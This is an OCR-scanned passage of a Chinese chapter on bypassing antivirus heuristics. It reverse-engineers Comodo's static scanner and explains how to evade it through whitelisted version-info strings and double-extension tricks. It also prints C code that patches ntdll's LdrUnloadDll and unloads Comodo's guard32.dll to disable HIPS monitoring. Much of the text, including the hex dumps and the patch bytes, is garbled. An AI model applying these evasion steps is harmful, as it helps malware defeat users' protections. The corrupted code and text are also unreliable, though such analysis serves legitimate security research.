在 分 析 该 函数 之 前 ， 我 们 需要 在 IDA 中 定位 到 该 方法 的 相关 位 置 。 在 进行 了 一 系列 无 趣 的 未 
知 类 型 的 对 象 成 员 调 用 后 ， 对 成 员 scanMultipacked 有 一 次 调用 : 











.text:000000000000E4F9 mov esi, 
[pstScanOptions-SCANOPTION.eSHeurLevel] ; nLevel 
.text:000000000000EA4FD mov rcx, pstResult ; pstResult 
.text:000000000000E500 mov rdx, piSrcTarget ; piTarget 
.text:000000000000E503 mov rdi, this ; this 
.text:000000000000E506 call 


. ZN14CAEHeurScanneri5ScanMultiPackedEiP7ITargetP11 SCANRESULT ; 
CAEHeurScanner::ScanMultiPacked(int,ITarget *, SCANRESULT *) 


第 一 个 启发 式 程序 会 判断 文件 是 否 经 过 多 次 加 壳 。 在 这 次 调用 之 后 有 许多 指令 ， 包 括 对 
ScanUnknownPacker 一 次 很 有 意思 的 调用 : 














91 BRAK STA 133 





.text:000000000000E516 mov rcx, pstResult ; pstResult 
.text:000000000000£E519 mov rdx, pstScanOptions ; 
pstScanOptions 

.text:000000000000E51C mov rsi, piSrcTarget ; piSrcTarget 
.text:000000000000E51F mov rdi, this ; this 
.text:000000000000E522 call 


_ ZN14CAEHeurScannerl16ScanUnknowPackerEP7TITargetP11 SCANOPTIONP11, SCANRESULT 


CAEHeurScanner::ScanUnknowPacker(ITarget *, SCANOPTION *, SCANRESULT *) 


很 明显 ， 这 是 因为 Comodo 想 要 收集 更 多 的 相关 证 据 信息 。 它 想 要 借助 分 析 ， 来 弄 清楚 文件 
是 否 被 加 上 了 一 些 未 知 的 文件 过 。 当 然 ， 我 们 需要 了 解 文件 是 否 被 加 壳 ， 以 及 是 如 何 被 加 壳 的 。 
如 果 继 续 分 析 该 启发 式 引 擎 ， 我 们 会 发 现 该 次 调用 后 ， 接 着 又 是 许多 指令 ， 包 括 下 面 这 个 对 
ScanDualExtension 的 一 次 有 趣 的 调用 : 














.text:000000000000£E530 mov rcx, pstResult ; pstScanResult 
.text:000000000000E533 mov rdx, pstScanOptions ; pstScanOption 
.text:0000000000005E536 mov rsi, piSrcTarget ; piTarget 
.text:000000000000E539 mov rdi, this ; this 
.text:000000000000E53C call 


. ZN14CAEHeurScannerl7ScanDualExtensionEP7ITargetP11 SCANOPTIONP11 SCANRESULT 


CAEHeurScanner::ScanDualExtension(ITarget *, SCANOPTION *, SCANRESULT *) 
无 须 经 过 运行 程序 并 判断 分 析 的 操作 , 双 扩 展 名 文件 这 一 特征 就 会 直接 被 启发 式 引擎 列 为 用 
以 判定 恶意 文件 的 相关 证 据 之 一 。 现 在 ， 我 们 接着 分 析 剩 余部 分 的 调用 : 








.text:000000000000E557 mov rcx, pstResult ; pstScanResult 
.text:000000000000E55A mov rdx, pstScanOptions 

; pstScanOption 

.text:000000000000E55D mov rsi, piSrcTarget 

; piTarget 

.text:000000000000E560 mov rdi; thig ; this 
.text:000000000000E563 call 


. ZN14CAEHeurScanner13ScanCorruptPEEP7ITargetP11_SCANOPTIONP11_SCANRESULT 
CAEHeurScanner::ScanCorruptPE(ITarget *, SCANOPTION *, SCANRESULT *) 
ia) 


.text:000000000000E584 mov rsi, piSrcTarget ; piTarget 
.text:000000000000E587 mov rdi, this ; this 
.text:000000000000E58A call 


. ZN14CAEHeurScannerb5bIsFPsEP7ITarget ; CAEHeurScanner::IsFPs(ITarget *) 
PE 


首先 ， 启 发 式 引 擎 会 调用 函数 Scancorrupt PE 来 检查 文件 是 否 已 经 损坏 。 接 着 ， 引 擎 会 调 
用 函数 IsFPs， 来 判断 BE” 文件 是 否 是 误 报 。 函 数 会 使 用 一 系列 已 知 的 误 报 进行 对 比 检查 。 
引擎 借助 一 系列 硬 编码 在 二 进 制 文件 中 的 列表 , 而 不 是 通过 类 似 反 病毒 特征 码 文件 这 类 易于 升级 
的 特征 模块 完成 检查 。 函 数 IsFPs 结 构 如 下 : 

.text:000000000000EABC ; PRBool , cdecl CAEHeurScanner::ISsFPs( 


CAEHeurScanner 
*const this, ITarget *piTarget) 
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.text:000000000000EABC public 
.ZN14CAEHeurScanner5ISsFPSEP7ITarget 

.text:000000000000EABC | ZN14CAEHeurScanner5bISFPsEP7ITarget proc near 
.text:000000000000EABC 

; DATA XREF: 

.got.plt:off 21B160 o 








.text:000000000000EABC ExitO0: 

.text:000000000000EABC this - rdi ; CAEHeurScanner 
*const 

.text:000000000000EABC piTarget - rsi ; ITarget * 
.text:000000000000EABC sub rsp, 8 

.text:000000000000EACO call 


. ZN14CAEHeurScanneri18IsWhiteVersionInfoEP7ITarget ; 
CAEHeurScanner::IsWhiteVersionInfo(ITarget *) 


.text:000000000000EAC5 test eax, eax 

.text:000000000000EAC7 bRetCode - rax ; PRBool 
.text:000000000000EAC7 setnz al 

.text:000000000000EACA movzx eax, al 

.text:000000000000EACD pop xd 

.text:000000000000EACE retn 





.text:000000000000EACE | ZN14CAEHeurScanner5ISFPsEP7ITarget endp 
IsFPs 调 用 了 另 一 个 成 员 : IswhiteVersionInfo。 如 果 分 析 该 函数 的 伪 代 码 , 我 们 会 发 现 
一 个 更 有 趣 的 算法 : 


beaa) 
if ( CAEHeurScanner::GetFileVer(v2, piTarget, wszVerInfo, 0x104uLL, 
v2-»m hVersionDll) ) 
{ 
for (i = 0; i < g_nWhiteVerInfoCount; ++i ) 


( 





if ( L1 (unsigned int)PR wcsicmp2 (wszVerInfo, 
g WhiteVerInfo[(signed _ int64)i].szVerInfo) ) 
return 1; 


提示 Æ Windowst -+ 台 上 ， 版 本 信息 被 存储 在 资源 目录 下 ， 且 有 着 定义 明确 的 结构 格式 。 
版 本 信息 通常 包括 文件 版 本 和 产品 版 本 数字 、 语 言 、 文 件 描述 和 产品 名 等 其 他 版 本 属性 








正如 预期 的 那样 , 启发 式 扫描 需 会 提取 PE 文件 头 版 本 信息 , 并 与 已 知 会 造成 冲突 但 无 恶意 风 
险 的 硬 编码 程序 版 本 信息 进行 对 比 。 地 址 gc_whiteverInfo 指 向 了 大 小 固定 的 UTF-32 字 符 串 列 
表 。 如 果 使 用 十 六 进 制 编辑 器 打开 查看 ， 会 得 到 如 下 结 


000000000021BAEE 00 00 41 00 00 00 6E 00 00 00 64 00 00 00 72 00 
ES. TE c TEEN e PEES AS 

000000000021BAFE 00 00 65 00 00 00 61 00 00 00 73 00 00 00 20 00 
e Ea Bia 
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000000000021BBOE 00 00 48 00 00 00 61 00 00 00 75 
E PEE NUES 

000000000021BB1E 00 00 6C 00 00 00 61 00 00 00 64 00 00 00 65 00 
.1...a...d...e. 

000000000021BB2E 00 00 6E 00 0000000 00 00 00 00 00 00 00 00 00 


00 00 00 73 00 


000000000021BBEE 00 00 41 00 00 00 72 00 00 00 74 00 00 00 69 00 
Ve UE sbu cds 

000000000021BBFE 00 00 6E 00 00 00 73 00 00 00 6F 00 00 00 66 00 
B m. M. 











000000000021BCOE 00 00 74 00 00 0020 00 00 00 53 00 00 00 2E 00 

Abas. SIM Me E is 

000000000021BCIE 00 00 41 00000 00 2E 00 00 00 00 00 00 00 00 00 

gest PE gc 

cas) 

000000000021BCEE 00 00 42 00 00 00 6F O00 00 00 62 00 00 00 53 00 
BO 

000000000021BCFE 00 00 6F 00 00 00066 00 00 00 74 00 00 00 00 00 
T. S pu. ce 


PP 








想 要 绕 过 简单 的 静态 启发 式 引擎 ， 我 们 可 以 给 恶意 软件 版 本 信息 使 用 在 白 名 单列 表 中 的 


UTF-32 编 码 字符 串 ， 如 Andreas Hausladen, ArtinSoft S.A. 或 BobSoft。 
现在 来 看 一 下 之 前 的 启发 式 程序 ， 如 ScanDualExtension: 


( 





iesus) 
if ( v22 
&& (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, 
g LastExtList, 


v22, 


6u) 





&& (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, 
g SecLastExtList, 


v18, 


Ox2Fu) ) 
{ 
CSecKit::DbgStrCpyA( 
&v6-»m cSecKit, 
"/home/ubuntu/cavse unix/scanners/heur/src/CAEHeurDualExtension 
.Cpp", 
T3; 
Scan result-»szMalwareName, 
Ox40uLL, 
"Heur.Dual.Extensions"); 
Scan result-»bFound = 1; 
result = OLL; 
} 
else 
{ 
LABEL, 23: 
result = 
} 
(二 二 二) 


0x80004005LL; 


可 以 很 清楚 地 从 上 述 伪 代 码 中 看 到 , 程序 校 验 了 扩展 格式 是 否 在 以 下 两 个 列表 中 : 


g Last- 
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置 成 1 ( 代表 true )。 














Extensions )， 同 时 对 象 bFouna 的 值 


现在 来 查看 两 组 拓展 格式 列表 : 

.data:000000000021B8D0 ; EXTENSION 0 g LastExtList[6] 
.data:000000000021B8D0 g LastExtList db '.EXE',0,0,0,0,0,0, '.VBS',0,0, 
0,0,0,0,'.,J78',0,0,0,0,0,0,0,  ,CMD',0,0,0,0,0,0, *;BAT',0,0,0,0,0,0, 
.data:000000000021B8D0 

; DATA XREF: .got:wcsExtList o 

.data:000000000021B8D0 dij *SCR',0,0,0;0,0,0 
.data:0000000000218B90C align 10h 

.data:000000000021B910 public g SecLastExtList 
.data:000000000021B910 ; EXTENSION 0 g SecLastExtList[47] 
.data:000000000021B910 g SecLastExtList db '.ASF',0,0,0,0,0,0,'.AVI',0,0 
;0, 070705, BMP*,0,0,0;0,0,0-  ,CAB'..0, 0,0, 0,0, 0, -CHM'; 0, 0,0, 0,0, 0; 
.data:000000000021B910 

; DATA XREF: .got:g SecLastExtList ptr o 

.data:000000000021B910 db: "CUR',0,0,0,0,0,0,"' DOC, 0, 0,0 
;0,0,0,'.MSG',0,0,0,0,0,0, "r EMbB';0,0,0,0,0,0, '.FLA',0,0,0,0,0,0, ' 
.data:000000000021B910 dl "FON',0,0,0,0,0,0,"'.GIF'.0.0;,0 
504 050, NLE .0;0;0, 0; 0,0, *-HTM' ;070,50,;0, 0,0,  HTT' 0,0, 0,0; 0,0, *., * 
.data:000000000021B910 db." T60*.,0,.0, 0,0, 0,0, LNE 0,0, 0 
,0,0,0, .INI',0,0,0,0,0,0, .50G8',0,0,0,0,0,0, '. MID',0,0,0,0,0,0, "a" 
.data:0000000000218B910 dp. *DOC^ 0, e 0,0,0,0;  -JPE' 0,0, 0 
,0,0,0, '.JFIF',0,0,0,0,0,*.MOV',0,0,0,0,0,0, '.MP3" ,0,0,0,0,0, tt 
.data:0000000000218B910 db 'MP4',0, * 0,.0,,0,.0, *- PDE* 0, 0,.0 
PR 05 0, ; PPT'*..0;-0.0:, 07 0,0; PNG! 0,0,0,;0,0, 0, RAR 0,0, 0, 0,0, 0, *.. 
.data:000000000021B910 db. "REG" .,0,0,0,0,0,0, '..RM',0,0, 0 
0. 0:00, * S RME *; 0,.0,0,.05 0,0; '; RMVB* 0, 0,0, 0,0; ' AIEEG 0 0,070; 0; '.' 
.data:0000000000218B910 db 'TIF',0,0,0,0,0,0,'.IMG',0,0,0 
r0 0,0, * WMV" 0,0, 0,0, 0,0, 0,0,0,0,0,0,0, '.5SWF',0,0,0,0,0,0; ' 
.data:0000000000218B910 db *JPG*',0,0,0,0,0,0, '. TXT',0, 0, 0 
,0,0,0,* .WAV' .0,0,0,0,0,0, *.. X5S5*,0,0,0,0,0,0,* XLBT*' 070,050; 0; 0, *..* 
.data:000000000021B910 db 'XLV',0,0,0,0,0,0,' .ZIP',0,0,0 
5,035050 


正如 我 们 所 见 ， 扩 展 列 表 由 











ExtList 和 g_SecLastExtList。 如 果 是 ， 结 果 对 象 实例 Scan_result 就 会 被 更 新 ， 这 样 成 员 


szMalwareName 就 会 包含 侦 测 名 称 (Heur .Dual. 会 被 设 


固定 大 小 的 ASCII 字 符 串 集合 以 及 其 他 各 类 典型 文件 拓展 格式 组 


成 。 第 一 个 扩展 列表 包含 了 许多 典 campa 文件 拓展 格式 ( 如 .EXE、.CMD 、.VBS 等 )， 第 二 个 
、 声 音 和 图 像 文件 拓展 格式 (如 .AVI 或 .BMP )。 两 个 拓展 列表 用 


列表 包含 了 许多 流行 文件 、 视 频 
于 检查 文件 名 的 形式 是 否 为 


Invoice.pdf.exe。 类 似 的 双 文 件 拓 展 名 ， 和 党 被 恶意 





“文件 名 .个 数 第 二 个 扩展 名 倒数 第 一 个 扩展 名 ”， 

















例如 


软件 用 于 社会 工程 学 攻击 ， 欺 骗 用 户 认为 他 们 


当前 点 击 的 可 执行 文件 其 实 是 视频 、 图 片 、 文 档 格式 、ZIP 文 件 等 其 他 种 类 的 文件 。 要 绕 过 启发 
式 引 擎 检测 , 你 可 以 使 用 上 面 第 一 个 拓展 格式 列表 中 没有 列 出 的 可 执行 文件 格式 作为 单一 的 文件 
扩展 名 ( 如 .CPL、.HTA 或 .PIF )， 也 可 以 使 用 没有 在 前 面 不 可 执行 文件 类 型 列表 中 列 出 的 第 二 种 





文件 扩展 名 ( 如 .JPG 或 .DOCX )。 
正如 本 节 所 讲 的 那样 ,只 需要 


进行 少量 的 研究 , 就 可 以 欺骗 并 绕 过 


“专家 系统 ”启发 式 引擎。 
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9.1.3 动态 启发 式 引 擎 


动态 启发 式 引擎 通过 在 用 户 或 内 核 态 下 的 hook 技 术 实 现 , 也 可 以 通过 模拟 引擎 实现 。 前 者 相 
对 更 可 靠 , 因为 使 用 hook 技 术 的 动态 启发 式 引擎 分 析 的 是 程序 的 真实 运行 行为 ; 而 后 者 十 分 容易 
出 错 ， 因 为 它 在 很 大 程度 上 取决 于 对 应 CPU 模拟 引擎 以 及 模拟 的 操作 系统 API 的 质量 。 绕 过 基于 
模拟 器 和 虚拟 执行 环境 的 方式 ， 到 目前 为 止 是 最 简单 的 可 行 方式 ， 正 如 第 8 章 中 讨论 的 那样 。 但 
是 , 绕 过 基于 hook 技 术 的 启发 式 引 擎 ， 比 如 主机 入 侵 防御 系统 (HIPS ), 并 不 是 特别 复杂 的 过 程 。 
不 过 这 取决 于 APIhook 设 置 在 了 什么 层 。 安 装 hook 来 监控 程序 行为 有 两 个 选择 : 用 户 态 hook 和 内 
核 态 hook。 两 者 都 有 各 自 的 优 缺 点 ， 接 下 来 我 们 将 会 一 一 讲解 。 

1. 用 户 态 hook 

许多 反 病 毒 软件 使 用 用 户 态 hook 来 监控 进程 执行 。 这 一 过 程 通过 hook 一 些 Windows 常 见 的 
API 实 现 ， 如 createFile 或 CreateProcess。 因 此 , 与 执行 真实 代码 不 同 ， 反 病毒 软件 设置 的 
监控 代码 会 首先 执行 。 接 着 ， 依 据 设 定 的 一 系列 规则 ( 可 能 是 预 设 好 的 或 动态 的 )， 监 控 代 码 会 
阻止 、 放 行 或 报告 API 的 执行 。 这 类 用 户 态 APIhook 通 常会 借助 第 三 方 hooking 库 实现 。 下 面 列 出 
了 一 些 最 常见 的 hooking 库 。 

口 madCodeHook 这 是 一 个 使 用 Delphi 语 言 编 写 的 用 户 态 hooking 引 擎 ， 支 持 许多 不 同 的 运 

行 环境 。Comodo 、 旧 版 本 的 McAfee 以 及 Panda 反 病毒 解决 方案 都 应 用 了 此 引擎 。 

口 EasyHook 该 开源 hooking 引 警 以 其 出 色 的 性 能 和 完整 性 著称 。 目 前 有 一 些 反 病毒 软件 正 

在 使 用 EasyHook。 

O Detours ”这 是 一 款 Microsoft Research 专 利 出 品 的 hooking 引 警 。 该 引擎 的 代码 是 开放 下 载 
的 ， 但 是 如 果 要 在 商业 付费 版 产品 中 使 用 该 引擎 需要 首先 获得 授权 许可 。 一 些 反 病毒 引 
擎 目前 正 使 用 该 hooking 引 擎 实现 Ring-3 层 面 的 系统 实时 防护 监控 。 

在 任何 情况 下 ， 因 为 所 有 用 户 态 的 hooking 引 擎 工作 方式 十 分 相似 ， 所 以 其 实 我 们 不 需要 在 
意 目标 反 病 毒 软件 使 用 的 hooking 引 擎 具体 是 哪 一 款 。 

(1) 首先 ， 这 类 引擎 会 向 要 监控 的 用 户 态 进 程 注 入 一 个 库 。 一 般 情 况 下 ，hooking 库 会 注入 系 
统 所 有 进程 ， 这 样 才 能 实现 针对 用 户 态 进 程 的 系统 级 监控 。 

(2) 引擎 会 拆 解 反 病毒 软件 需要 监控 的 API 冰 数 。 

(3) 引擎 会 用 ump 指 令 替 换 函 数 的 第 一 个 汇编 指令 , 让 反 病 毒 软件 的 相应 代码 逻辑 有 能 力 处 理 
对 应 的 API。 

(4) 当 反 病毒 软件 hook 了 API 代 码 并 完成 了 行为 监控 任务 ，hook 会 将 API 回 调 至 “unhooked” 
的 代码 路 径 。 

反 病 毒 软 件 hooking 库 可 以 通过 多 种 技术 注入 。 过 去 最 常见 的 技术 (现在 Microsoft 已 经 不 再 
推荐 使 用 该 方法 了 ) 之 一 是 使 用 注册 表 键 AppInit DI1。 除 了 少数 例外 (如 Csrss.exe )， 注 册 表 键 
包含 了 向 所 有 调用 user32.dll 的 Windows 进 程 的 DLL 文件 的 一 个 或 多 个 路 径 。 许 多 年 来 ， 这 一 直 是 
各 家 反 病 毒 软 件 的 首选 方式 。 目 前 卡巴 斯 基 、Panda 和 许多 其 他 各 类 反 病 毒 产品 正在 使 用 这 一 技 
术 ( 当然 不 少 恶意 软件 也 会 使 用 这 类 技术 )。 
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还 有 一 个 代码 注入 技术 ,不 过 不 是 十 分 靠 谱 ， 其 工作 原理 是 : 当 Windows 桌 面 启 动 时 ， 执 行 
相关 反 病 毒 程序 模块 ， 通 过 createRemoteThread 注 explorer.exe 进程 Jf hook 住 
CreateProcessInternal 随 数 。CreateProcessInternal 捕 数 会 在 新 进程 被 创建 前 调用 。 
为 hook 了 该 API， 反 病毒 软件 会 向 新 程序 的 内 存 空间 注入 hooking DLL。 由 于 CreateRemote- 
Thread API 的 限制 ， 该 项 技术 不 能 保证 能 监控 所 有 新 进程 。 不 过 ， 仍 有 不 少 反 病 毒 产品 正在 使 
用 这 种 技术 。 

最 后 一 个 注入 DLL 文件 的 典型 方式 是 从 内 核 态 实现 的 。 反 病毒 驱动 注册 了 一 个 Psset- 
createProcessNotifyRoutineEx 回 调 , 用 一 个 仅 包 含 用 户 态 代码 的 DLL, 在 内 核 态 向 新 进程 
注入 DLL 文 件 。 

除了 使 用 的 注入 技术 有 所 不 同 外 ， 所 有 hooking 引 擎 的 工作 原理 几乎 是 一 致 的 ， 因 此 你 可 以 
使 用 通用 技巧 来 绕 过 一 些 或 者 全 部 在 用 户 态 实现 的 hooking 引 警 。 这 项 绕 过 技巧 基于 以 下 事实 : 
反 病 毒 软件 hooking 引 擎 必须 重 写 原 生 函 数 序言 ( prologue )， 使 用 jump 将 原生 函数 蔡 换 为 软件 的 
相应 分 析 函 数 。 因 此 ， 你 可 以 直接 通过 逆向 分 析 这 些 变动 点 ， 仓 载 撤销 hook。 

为 了 更 好 地 理解 这 一 概念 , 需要 注意 的 是 , 大 多 数 框架 结 构 的 函数 拥有 相同 的 字 节 码 序列 或 
HLAS, WTF: 





















































8BFF mov edi,edi 
55 push ebp 
8BEC mov ebp,esp 




















HRM hook SE RENIA Je 6 THO Ze E FCRI P FE PRU A B5 YA, 接着 用 上 述 字 
节 码 序列 重 写 函 数 的 开头 部 分 。 但 如 果 被 hook 的 函数 有 不 同 的 序言 ,那么 这 种 办 法 很 可 能 会 失效 。 
下 面 介绍 一 种 可 以 用 于 缉 载 撤销 API hook 的 更 好 方式 。 

(D) 从 硬盘 中 读 取 原 生 库 ( 即 kernel32.dll 或 ntdll.dl 的 代码 )。 

(2) 从 库 中 拆 解 出 被 hook 的 函数 地 址 。 这 是 可 以 实现 的 ， 比 如 通过 使 用 Microsoft 库 dbgeng.dll 
或 手动 分 析 导 出 的 DLL 列表 来 找 出 相关 地 址 。 

(3) 读 取 这 些 函 数 的 初始 字 节 。 

(4) 将 原始 字 节 写 回 内 存 中 。 反 病毒 软件 可 能 会 捕获 到 该 项 操作 。 这 里 有 一 种 替代 方案 ， 执 
行 从 文件 中 读 取 的 第 一 个 指令 ， 接 着 跳 转 回 原始 代码 。 

接 下 来 将 会 演示 一 种 绕 过 类 似 启 发 式 引擎 的 更 简单 的 方法 。 





























HER “ 绕 过 启发 式 引 擎 使 用 的 用 户 态 hook 甚 至 会 比 刚 刚 讨 论 的 通用 解决 方案 来 得 容易 。 用 户 态 
hook 可 以 在 多 个 层面 上 执行 。 比 如 ， 可 以 hook kernel32.dll 的 CreateFileA 和 
CreateFileW 了 马 数 ,也 可 以 hookntdll.dl! 的 NtOpenFile 函 数 。 最 底层 的 用 户 态 是 ntdll.dl]。 
但 是 在 许多 情况 下 ， 反 病毒 产品 仅 hook 最 高 级 别 的 由 advapi32.d]l] 或 kernel32.dl] 导 出 的 函 
数 。 在 这 种 情况 下 ， 我 们 不 需要 修改 已 加 载 库 的 内 存 来 部 载 移 除 hook， 而 是 只 需要 使 用 
ntdll.dll 导 出 的 API ( 一般 称 作 原生 API )， 反 病毒 hooking 引 擎 就 会 忽略 恶意 软件 样本 的 相 
关 操 作 。 
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绕 过 用 户 态 的 HIPS 

inn Internet Security 8 及 其 更 早期 的 版 本 带 有 HIPS 和 沙 盒 。 自 然 ，HIPS 就 是 一 个 启发 式 
引擎。 沙 盒 属于 反 病 毒 软件 的 内 核 态 部 分 ， 但 HIPS 并 不 是 。HIPS 仅 在 用 户 态 执行 生 效 ， 通 过 向 
所 有 用 户 态 进程 注入 guard32.dll 或 guard64.dll ( 取决 于 结构 以 及 执行 的 程序 ) 实现 。 要 注意 的 是 ， 
如 果 这 些 DLL 没 有 注意 到 要 添加 ASLR (address space layout randomization ) 保护 ， 那么 将 会 造成 
应 用 在 所 有 受 保护 的 用 户 态 部 分 上 的 系统 层面 的 ASLR 保 护 失 效 。 再 次 强调 ， 这 里 讨论 的 是 反 病 
毒 软件 将 没有 ASLR 保 护 的 DLL 注 入 到 进程 中 。Comodo 在 这 里 也 犯 了 类 似 的 错误 , 通过 没有 启用 
ASLR 的 程序 实现 hook， 如 图 9-2 所 示 。 





























E ig explorer.exe 4912 0.03 50,268 K. 68,924 K Windows Explorer Microsoft Corporation DEP (permanent) ASLA Medium 
E gCisTiay.exe 3738 032 8.980K 12,308 K COMODO Intemet Security COMODO DEP (permanent) ASLA Medium 
cis.exe 1828 < 0.01 19184K 3,156 K COMODO Intemet Security COMODO DEP (permanent) ASLA Medium 
cis.exe 1028 064 39.972K 14,580K COMODO Intemet Security COMODO DEP (permanent)  ASLR Medium 

E] Qj procexp.exe 3448 4020K 8,420 K Sysinternals Process Explorer Sysintemals - www.sysinter... DEP. ASLR High. 

2 procexpb4.exe. 5588 107 20176K 26,508 K Sysinternals Process Explorer Sysintemals - www.sysinter.. DEP (permanent) ASLA High 
g GeekBuddyRSP.exe 3476 0.02 3036K 5,272 K GeekBuddy Remote Screen ... Comodo Security Solutions... DEP ASLR Medium 
Qy trustedadssvc.exe 4972 «0.01 22812K 33,082 K PrivDog Service AdTrustMedia DEP ASLR Medium 
[m] csrss.exe 3140 001 16404 K 11,100 K Client Server Runtime Process. Microsoft Corporation DEP (permanent) ASLA System 
B a winlogon.exe 5564 2740K 6,396 K Windows Logon Application Microsoft Corporation DEP (permanent) ASLA System 





[e^] LogonUl.exe 1216 0.01 16316K 26,468 K Windows Logon User Interfa... Microsoft Corporation DEP [permanent) ASLA System 
) 0.38 70,024 K 90,532 K Firefox Mozilla Corporation d ASLR Medium 












[Descipion |companName [veson — [astan ^ — — [| Base| ImageBase| 





guard32. dll COMODO Intemet Security COMODO 7.0.53315.4132 0x10000000 010000000 
|apisetschema.dll ApiSet Schema DLL Microsoft Corporation 5.1.7601.18229 ASLR 0x40000 0x0 
firefos.exe Firefox Mozilla Corporation 23.01.4974 ASLR Ox12E 0000 Dx12E0000 
| mozjs.dll ASLR Dx2F30000 0x71600000 
apims-win-downlevel-shlwapi-2-1-0. dll ApiSet Stub DLL Microsoft Corporation 52820016492 ^ ASLR «36D 0000 0x70DA0000 
|propsys.dll Microsoft Property System Microsoft Corporation 7.0.7601.17514 ASLR 0x3C80000 070080000 
|ExplorerFrame.dll ExplorerFrame. Microsoft Corporation 51760117514 ^ ASLR Dx8750000 0x71490000 
xul dll Mozilla Foundation 23.01.4974 ASLR 0x65C50000 0x65C50000 
|D'write.dll Microsoft DirectX Typography Services Microsoft Corporation 6.2.3200.15571 ASLR Dx6CC00000 0x6CC00000 
|winsta. dll Winstation Library Microsoft Corporation 517560117514 — ASLR 0x6EAB0000 Ox6EAB0000 
| dui7U. dll Windows DirectUl Engine. Microsoft Corporation 5.1.7600.15385 ASLR 0x72440000 0x72440000 
| gkmedias. dll Mozilla Foundation 23.0.1.4974 ASLA Dx72E80000 0x72E80000 
|nssckbi.dll NSS Builtin Trusted Root CAs Mozilla Foundation 1.940.0 ASLR 073550000 073550000 
freebl3.dll NSS freebl Library Mozilla Foundation 3150.0 ASLR 0x735C0000 Ox735C0000 
nssdbm3.dll Legacy Database Driver Mozilla Foundation 31500 ASLR 0x73720000 Dx73720000 
|softokn3. dll NSS PKCS #11 Library Mozilla Foundation 315.00 ASLR 0x73740000 Dx73740000 
|duser.dll Windows DirectUser Engine Microsoft Corporation 5.1.7600.16385 ASLR Dx73770000 0«73770000 
aC aa ll d m ar " ca 








图 9-2 ”未 启用 ASLR 保 护 的 Comodo HIPSZ|5ETE A $i T Firefox 


Comodo 的 guard32 和 guard64 库 hook 了 类 似 kernel32!CreateProcess[A|IW] 、kerne1321 
createFile[AIW] 和 ntallldqrUunloadD11 导 出 的 用 户 态 函 数 。 绕 过 此 类 动态 启发 式 引 擎 防护 
侦 测 的 一 个 快速 简单 的 方式 是 ， 通 过 卸载 hook 库 〈 针对 32 位 进程 的 guard32.dll 和 针对 64 位 进程 的 
guard64.dll ) 禁用 HIPS 防 护 。 

我 第 一 次 尝试 的 方法 使 用 了 以 下 代码 : 

int unhook (void) 


{ 
return FreeLibrary (GetModuleHandleA("guard32.d11")); 


} 

但 是 ， 这 似乎 不 起 作用 。unhook 函 数 的 返回 值 一 直 是 错误 5“ 拒 绝 访 问 ”。 将 调试 器 附加 到 
对 应 用 户 态 进程 上 后 ， 我 们 会 发 现 检 测 模 块 hook 了 FreeLibrary 函 数 ， 这 一 过 程 不 是 在 kernel32 
层 ( kerne32Fg 5E T PRÉ Pr eeribrary ) 而 是 在 ntdll.dll 层 通过 hook 函 数 LarUnloadD11 实 现 。 
通过 什么 办 法 可 以 印 载 HIPS 引 擎 的 hook? 我 们 可 以 移 除 LarUunloadp11 上 的 hook, 接着 调用 之 前 
的 代码 ， 代 码 如 下 : 
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HMODULE hlib = GetModuleHandleA( 


if ( hlib !- INVALID HANDLE VALUE ) 


{ 


void *addr = GetProcAddress (GetModuleHandleA(" 


"guard32.dll"); 


"LdrUnloadDll"); 


if ( addr !- NULL ) 


{ 


DWORD old prot; 


ntdll.dll"), 





if ( VirtualProtect(addr, 16, PAGE EXECUTE READWRITE, 


&old prot) !- 0 


) 


// Bytes hard-coded from the original Windows 7 x32 
// ntdll.dll library 


char *patch = "Wx6ANx14Nx68NxD8NxXBCNXE9Nx7DNXE8Nx51NxCC" 


"AXFENXFFAX83NX65NXEONxXOO"; 


memcpy (addr, patch, sizeof(patch)); 


VirtualProtect(addr, 16, old prot, 


if ( FreeLibrary (hlib) ) 


MessageBoxA(0, "Magic done", "MAGIC", 


) 








&old prot); 


0); 


为 了 跟 进 这 一 简单 的 例子 , 我 们 只 需要 回 到 ntdll.dl] 导 出 的 函数 arUunloadD11 的 人 口 点 处 ， 
然后 借助 guard32.dll 库 的 句柄 调用 FreeLibrary。 就 像 听 起 来 的 那样 ， 这 一 过 程 十 分 容易 。 事 


实 上 ， 这 一 绕 过 HIPS 的 方式 已 经 被 使 用 了 很 多 次 。 我 记得 第 一 次 有 人 提 到 这 





一 技术 是 在 Phrack 


杂志 (2003~2004 年 第 11 卷 ， 第 62 期 )， 可 以 通过 http://grugq.github.io/docs/phrack-62-05.txt 访 问 


到 原文 。 


正如 The Grugq ( 该 文章 作者 之 一 ) 在 重新 发 现 他 十 多 年 前 使 用 的 技术 时 说 到 的 那样 : 


态 的 沙 盒 无 法 工作 。 如 果 沙 盒 后 


个 样子 。” 事实 证明， 他 说 的 一 





恶意 软件 在 同一 个 地 址 空 
点 也 没 错 。 


xp], IRA 





么 恶意 


意 软 件 会 最 终 获胜 。 





“用 户 


就 是 这 





9.1 启发 式 引擎 种 类 141 





3. 内 核 态 hook 

正如 前 面部 分 中 提 到 的 那样 ， 绕 过 用 户 态 的 hook ( 大 多 数 用 户 态 启发 式 引 擎 的 实现 途径 ) 是 
一 项 十 分 轻松 的 任务 。 那 么 内 核 态 的 hook 又 如 何 呢 ? 它们 又 是 如 何 实现 的 ? 又 该 如 何 绕 过 这 类 局 
发 式 引 警 防护 呢 9 可 以 在 任何 层 内 核 态 实现 hook。 反 病 毒 软 件 可 以 在 内 核 层 面 通过 下 列 函 数 的 回 
调 hook 进 程 或 线程 的 创建 : 

D PsSetCreateProcessNotifyRoutine 每 当 进程 被 创建 或 删除 后 ， 就 从 调用 程序 列表 

中 添加 或 移 除 元 素 ; 

口 PsSetCreateThreadNotifyRoutine 注册 一 个 由 驱动 实现 的 回调 ， 每 当 新 的 线程 被 

创建 或 删除 时 ， 就 发 出 提示 ; 

O PsSetLoadImageNotifyRoutine 注册 一 个 由 驱动 实现 的 回调 ， 每 当 新 的 图 像 被 加 载 
或 绘制 进入 内 存 的 时 候 ， 就 发 出 提示 。 

上 述 这 些 函 数 是 以 内 核 驱 动 方式 执行 的 ， 在 创建 启发 式 引擎 的 同时 ， 也 在 程序 执行 或 加 载 
前 对 其 进行 分 析 。 与 在 用 户 态 实现 hook 的 引擎 不 同 ， 对 用 户 态 程序 来 说 ， 它 们 无 法 绕 过 或 获取 
已 安装 的 回调 信息 。 但 运行 在 内 核 层 的 恶意 软件 却 可 以 实现 这 一 点 。 接 下 来 选取 一 个 典型 例子 
进行 说 明 。 

